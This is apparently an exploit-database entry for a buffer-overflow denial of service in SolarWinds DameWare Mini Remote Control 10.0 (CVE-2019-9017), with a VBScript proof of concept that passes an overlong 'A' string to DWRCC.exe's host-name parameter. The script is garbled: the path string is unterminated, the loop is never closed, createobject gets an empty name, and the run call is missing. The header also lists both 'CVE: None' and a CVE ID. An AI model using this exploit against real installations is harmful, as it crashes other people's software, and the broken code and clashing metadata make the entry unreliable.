SolarWinds DameWare Mini Remote Control 10.0 - Denial of Service

ID: 101414
CVE: None
Download vulnerable application: None
#Vendor:     Solarwinds
#Site Vendor:
#Product:     Dameware Mini Remote Control
#Version:    10.0 x64
#Platform:    Windows
#Tested on:    Windows 7 SP1 x64
#Dscription:    The DWRCC executable file is affected by a buffer overflow vulnerability.
#The buffer size passed in on the machine name parameter is not checked
#Vector:    pass buffer to the machine host name parameter

#Author:    Dino Barlattani [email protected]

#CVE ID:    CVE-2019-9017

#POC in VB Script

option explicit
dim fold,exe,buf,i,wsh,fso,result
exe = "DWRCC.exe"
fold = "C:\program files\SolarWinds\DameWare Mini Remote Control 10.0 x64
for i = 0 to 300
    buf = buf & "A"
set wsh = createobject("")
set fso = createobject("scripting.filesystemobject")
if fso.folderexists(fold) then
    fold = fold & exe
    fold = chr(34) & fold & chr(34)
    result = & " -c: -h: -m:" & buf,0,true)
end if
1-4-2 (www01)